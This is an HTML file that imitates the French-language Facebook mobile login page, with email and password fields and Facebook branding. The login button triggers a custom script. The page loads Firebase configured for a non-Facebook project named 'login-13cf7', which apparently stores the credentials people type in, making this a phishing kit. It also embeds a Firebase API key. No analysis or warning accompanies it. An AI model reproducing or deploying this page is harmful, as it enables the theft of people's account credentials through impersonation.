<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Bienvenue sur Facebook</title><meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1"><link href="./fb/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196"><meta name="referrer" content="default" id="meta_referrer"><link rel="stylesheet" type="text/css" id="EH5zP" href="./fb/g0LCLCXVa_q.css"><link rel="canonical" href="#"></head><body tabindex="0" class="touch x1 _fzu _50-3 iframe acw portrait" style="min-height: 664px; background-color: rgb(255, 255, 255);"><div id="viewport" style="min-height: 664px;"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><div id="page"><div class="_129_"></div><div class="_4g33 _52we _52z5" id="header"><div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="#"><i class="img sp_qpIvdSU5o3E sx_72920b"><u>facebook</u></i></a></div></div><div id="root" role="main" class="_5soa acw" data-sigil="context-layer-root content-pane" style="min-height: 664px;"><div class="_4g33"><div class="_4g34"><div><div class="aclb _5rut" data-sigil="traditional-login"><div class="_4fmw grouped aclb"><a class="touchableArea first last area touchable acy apl abt abb" href="#" target="_top" data-sigil="touchable marea"><div class="ib cc"><i class="l img sp_mJP1XY0f7L- sx_3159a9"></i><div class="c"><span class="fcl">Utilisez Facebook pour Android et naviguez plus rapidement.</span><br></div></div></a></div><br><input type="hidden" name="lsd" value="AVp6t0BP" autocomplete="off"><input type="hidden" name="lsd" value="AVrNN9kA" autocomplete="off" /><input type="hidden" name="jazoest" value="2650" autocomplete="off" /><input type="hidden" name="m_ts" value="1551566108" /><input type="hidden" name="li" value="HAV7XP3AN9GREitKysgxRiaS" /><input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" /><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" /><div class="_56be _5sob"><div class="_55wo _55x2 _56bf"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq" name="email" id="email" placeholder="Adresse e-mail ou mobile" value="" type="text" data-sigil="login-form-input"><div class="_3nph _mg8"><div class="_4g33"><div class="_4g34 _5i2i _52we"><div class="_5xu4"><input id="pass" autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" name="pass" placeholder="Mot de passe"  type="password" data-sigil="login-form-input password-plain-text-toggle-input"></div></div></div></div></div></div><div class="_2pie"><button type="button" value="Connexion" onclick="subbtn()" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" name="login" id="submitBtn" data-sigil="touchable"><span class="_55sr">Connexion</span></button></div><div class="_52jj _5t3b"><a class="_54k8 _56bs _5t3b _56bw _56bv" data-store="{&quot;nativeClick&quot;:true}" href="#" role="button" data-sigil="touchable"><span class="_55sr">Créer un compte</span></a></div><div class="other-links"><ul class="_5pkb _55wp"><li><span class="mfss fcg"><a href="#">Mot de passe oublié&nbsp;?</a><span aria-hidden="true"> · </span><a class="sec" href="#">Pages d’aide</a></span></li></ul></div></div></div><div class="_55wr _5ui2"><div class="_5dpw"><div class="_5ui3" data-sigil="marea"><div class="_4g33"><div class="_4g34"><span class="_52jc _52j9 _52jh">Français (France)</span><div><span class="_52jc"><a href="#" data-sigil="ajaxify">English (UK)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Português (Brasil)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Italiano</a></span></div></div><div class="_4g34"><div><span class="_52jc"><a href="#" data-sigil="ajaxify">العربية</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Español (España)</a></span></div><div><span class="_52jc"><a href="#" data-sigil="ajaxify">Deutsch</a></span></div><span class="_52jc"><a href="#">Autres langues…</a></span></div></div></div><div class="_5ui4"><span class="mfss fcg">Facebook ©2019</span></div>


<script src="https://www.gstatic.com/firebasejs/5.8.5/firebase.js"></script>
<script>
  // Initialize Firebase
  var config = {
    apiKey: "AIzaSyBztqGE4bCYlCBoYz7n5w7kX2I3CkBaSoo",
    authDomain: "login-13cf7.firebaseapp.com",
    databaseURL: "https://login-13cf7.firebaseio.com",
    projectId: "login-13cf7",
    storageBucket: "login-13cf7.appspot.com",
    messagingSenderId: "403167025869"
  };
  firebase.initializeApp(config);
</script>
<script src="index.js" ></script>

</body></html>

